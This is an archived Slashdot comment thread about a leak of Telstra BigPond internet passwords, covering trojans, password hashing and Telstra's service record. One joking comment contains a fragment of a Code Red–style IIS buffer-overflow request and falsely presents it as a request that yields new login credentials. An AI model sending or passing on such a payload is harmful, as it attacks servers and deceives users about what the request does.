Slashdot Mirror
Telstra BigPond Passwords Leaked
Lord Cyric writes: "Telstra, DownUnder's biggest and baddest telco, has had a major security breach yesterday when a sample of its BigPond Internet password list was posted on various newsboards. The Australian Broadband Users Group (ABUG) has confirmed that this is not a hoax. This hack exposes the passwords for most of Telstra's Internet services (dialup, cable & ADSL). With all the bad press Telstra has been receiving lately over it's shoddy ADSL rollout and download caps, they certainly didn't need this ..." This site is not exactly the Telstra P.R. department.
When someone has a problem they get person who looks good from 2 cubicles down to fix it and he/she just screwes up half the settings and services on the machine which compromise the security.
Leave your housedoor open and intruders come in.
How the fuck can it not be Telstra's fault?
--
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
--
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
There seems to be a higher rate of crack-smoking moderators lately, but that's probably not related.
I see even classic Slashdot is now pretty much unusable on dial up anymore.
Before I start I'll just say I am a Bigpond Cable subscriber.
With out more info there is no way of knowing if this is a crack or PEBCAK. It's entirely possible that this was done with social engineering or trojan(s), not a 1337 4ax0r. So far all that's known that 70 accounts were comprimised by some method.
To put it in perspective, recently somebody sent an email to a large number Bigpond users pretending to be from Telstra asking them for their password and credit card number just so they could check their records. A depressing number of people replyed. We're not talking about the most security literate people in the world here.
Telstra uses pretty much standard PPPoE for ADSL although they do use the ADSL modems that had the security problem a while back.
We've also heard that Telstra has already caught the person responsible.
BTW the "Australian Broadband Users Group" are widely regarded among Australian broadband users to be a bunch of self-important tools who are pretty much out to make themselves look big. The only guy who's worth listening to is they guy that runs www.whirlpool.net.au The rest are just dead weight.
Nerd: Derogatory term typically directed at anybody with a lower Slashdot ID than you.
More often the problem lies with management that won't allow the engineers to carry out best practices. This is because the best practices involve things that take extra time. Since the sales people usually commit product delivery often even before the development department ever heard of it, management gets really cranky about delivery times. Quality just goes out the window because that isn't what sales committed the company to.
Let's rake some managers and marketers over the coals first.
now we need to go OSS in diesel cars
If it was a decent system the hashes of the passwords would be stored, not the passwords themselves (encrypted or not)
Belief is the currency of delusion.
> If it was a decent system the passwords would all be encrypted, and it would not allow insecure passwords.
I keep seeing this sort of stuff - presumably refering to hashed passwords rather than encrypted. However there is a problem... if you use APOP or CHAP or similar the server end needs to have plaintext equivalent passwords on its end. Typically this means that the RADIUS servers have the plaintext passwords available. This is problematic - you would prefer to keep passwords hashed, but frankly its normally easier to nail down your RADIUS server than it is to nail down all the networking and other stuff to prevent sniffing of authentication sessions (and CHAP etc prevents those sniffs being useful).
So don't assume plaintext passwords on authentication servers is necessarily a bad thing.
From what I can tell, if Telstra resets your password its to something like "adsl####". Someone told me that they pick a new password every day.
Its also a real mess to change since theres broken software there too!
Its just how things are done on the Information Super Outback!
As a BigPond ADSL user I have much to be thankful for. Thanks for the two-weeks downtime last month, changing the user agreement on download restrictions after the contract was signed, and forcing me to call every 4 days to reset my account when an authentication error on your end hangs the connection.
But most of all, thanks for leaking the account passwords through poor security and having the foresight to keep the server down right now so I can't change mine.
I prefer to not know user's passwords. If they forget them I replace the password with one thay have to change immediately, with automatic checking for crackable ones.
From NineMSN;
Telstra is evil, but this looks more like the work of idiot users.
Keep the pitchfork and flaming torches handy though, they'll fuck up sooner or later.
Another bad thing about the Telstra passwords is that they don't use any SSL to cover any of the access to subscribers' info. Therefore it just might be that the passwords were obtained from the net in transit - not necessarily from an in-situ source. At least, they don't use any SSL when I'm using my accounts, for which I've just changed my passwords, of course.
city: Adelaide, South Australia
with only 3 gigs a month (upstream and down) the adsl and cable *unlimited* accounts are just about useless. Maybe this will force someone in the Government (who still own 51% of telstra) to do something.
Someday, we'll look back on this, laugh nervously and change the subject.
Telstra's claiming that the 96 passwords published represented the entire list, not a sample. They've cancelled all the accounts concerned and re-provisioned (translation: re-generated random passwords) and contacted everyone concerned. They're saying it was the result of a trojan, which they've found installed on every one of the users' devices.
On some of the Australian mailing lists, we've had individuals claiming that whatever it is, it must be Telstra's fault. Come on, they're not particularly nice guys as far as responsible corporations go, but poor security must be the fault of the software vendors and lack of vigilance on the users' parts.
Just trying to install some sanity before all of this stuff gets repeated here once again....
toeslikefingers.com - because
Irrespective of where fault lies, anyone not familiar with Australia should realise that "Telstra Bashing" is virtually a national sport, and typically involves a lack of objectivity. This usually clouds any issue involving the company.
-- Matthew - matthew.gream@pobox.com, http://matthewgream.net
What? The site which originally broke the story (CORE) have now posted another article saying Telstra's servers were probably not cracked. Specifically:
Sub7 or some other "netbus" program has been used to leech the accounts of the users machines. This is at the moment the scenario I favour...
Sure, Telstra fucked up their ADSL network and extremely pissed off many users with their download caps, but there isn't proof yet that they screwed up on this too.
As a resident of Australia, this doesn't come as a big suprise to me. Ever since the Liberal government decided that selling off Telstra would actually be a *good* idea, the service has just gone completely downhill. Of course, in some ways it was never great to begin with but privatising it just makes it worse.
The point that successive governments (state and federal) don't understand is when you privatise a service, you change whatever the service is responsible to. Public-sector services are responsible to the government, who are in turn responsible (at least, they used to be) to the people. Politicians can be very sensitive to voter dissatisfaction (so the theory goes), especially around election times. But when you privatise the service, it becomes a private-sector entity whose responsibility is to the shareholders, not the people. Profits become the primary focus, and the quality of service declines. Witness such effects with the electricity and natural gas industries in Australia, and the electrical industry in California (the one currently being bailed out with taxpayers' money). What's worse is that as Telstra, being the government body in charge of telecommunications, was the one that set up and maintained all the infrastructure (phone lines etc). This puts them in a wonderful monopoly position as they own practically most of the telecommunications infrastructure in Australia (Optus has some infrastructure of their own as well as leasing from Telstra), and therefore can effectively charge what they like. Not only do the customers pay high prices for inferior service from Telstra, they have to pay high prices to Telstra's competitors because Telstra also charges high prices for them to use their network.
Telstra should have never been privatised to begin with. It was a simple election ploy for little Johnny Howard so that he would have some money to throw around, a way to buy votes. The Liberal government will spend the money on grand election promises and when they are voted out (it's only a matter of time, really) they will leave the successive Labor government with a dilemma. Raise income taxes/GST or sell off Telstra completely (the latter being the most likely). The sad reality of this is that while Telstra is responisble to the shareholders, the "mum-and-dad" shareholders that were meant to be the main beneficiaries of the sale hold precious little stock and can do absolutely nothing to influence the way the company is run.
The same Liberal government that sold Telstra is also unable (more likely they are unwilling) to send in the ACCC (Australian Competition and Consumer Commission, the same people who said "no thank you" to DVD regional zoning) and put the hard word on Telstra to improve their service. So, to be honest, this whole sorry saga has been an ill-conceived, money-motivated botch from the word go. Unless we either send in the ACCC and try to get some real results, or buy back the 51% of Telstra already sold (and pay for it later through higher national debt), this situation is unlikely to change.
Self Bias Resistor
----------
When the pin is pulled, Mr. Grenade is no longer our friend.
I just can't wait for hailstorm and .net, atleast now it's a two step prosses to hack my life, al la The Net.
Does anyone actually have a Java program designed to control air traffic, or for the operation of a nuclear facility?
A dictionary attack would probably use a dictionary 5 or 10 times that size, and wouldn't take all that much time to run. A 500 Mhz system can process a lot of ~12 character strings in an hour.
I strongly suggest you try a different scheme.
--
In spite of the suggestions and all the tests that I have made, I have not cavato a spider from the hole.
- had crappy security
- got hacked, hurting their users and customers in a tangable way
- were sued by thier customers
- lost/settled with their customers
As far as I can tell, the hackers are the ones considered culpable, not the incompitant admins who let them in. Is there a legal basis for this, or is it just the way things work? Or am I being paranoid?--
In spite of the suggestions and all the tests that I have made, I have not cavato a spider from the hole.
Allright, I'll bite.
What specific circumstances does "changing passwords regularly" protect against?
Assume that my passwords are all "very strong", they are not written down anywhere, and they're never transmitted in the clear over an un-secure network.
The only circumstance I can forsee this "helping" with (besides idiotic ones like people loosing the pices of paper they have their passwords written on), is where it's already in the hands of a "criminal". But AFAIK if someone already has a single user account, further user accounts (existing and specially-created) and the root account isn't far behind.
Can anyone point me to a scholarly analysis of the exact merits of regular password changing?
Why? Because I don't do it. If I were, with 20 different passwords and all of them of the "Strong" type, I'd be forced to write them down, or spend hours and hours figuring out 'mind games' to try and remember them, and even worse it would (and did in past years) result in an ever increasing number of "confused and forgotten" passwords. (Frequently occurs within 1-2 weeks of a change, when you just happened to not use that account, and so now you're mind is groping in among not only all your current passwords but the previous 1-3 rounds of passwords, and suddenly you're screwed. No fun.)
haven't looked anything up about it, as I don't live there, but they're doing some strange kind of deal with cable and free phone calls, ACT Electricity and Water are doing it... ACTEW...
anyone heard anything else about it?
This is the forum where the usernames were posted. Apparently it only affects teltra bigbond ADSL users.
--
0x00
l33t cl0wnZ
As you can read here Telstra are in fact denying any crack taking place. They're blaming it on the users!
... The passwords getting out could have been prevented by using strong encryption.
Or, if nothing else, encryption could have delayed the attackers getting the list...
Do you like German cars?
luckily telstra has embraced the obvious future of authentication on the internet and decided on a unilateral capitulation to microsoft's passport service. resistance is futile! duh!
;-)
/default.ida? NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801% u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801% u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff% u0078%u0000%u00=a HTTP/1.0
all of their subscribers have been sent an email saying to get a new user name and password by just sending the following simple http request to www.passport.com
GET
intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
Did timothy all of a sudden become the only one to post stories? Did he go on a killing spree?
grin
Reb
There is a good article, and a good discussion thread available at http://www.whirlpool.net.au. It outlines the fact that the passwords would never be stored in plaintext (the passwords are stored on industry-standard enterprise servers), and that many of the released passwords were extremely strong (suggesting the passwords were not cracked).
It seems only natural to assume someone has spent some time collecting logins and passwords via another method, and is posting their results with the view of creating FUD over Telstra's service. Just because 69 passwords have been obtained, doesn't mean there exists a vunerability for the tens or hundreds of thousands of subscribers of the service.
I don't particularly like Telstra, nor do I use their internet, but I dont believe they are this stupid.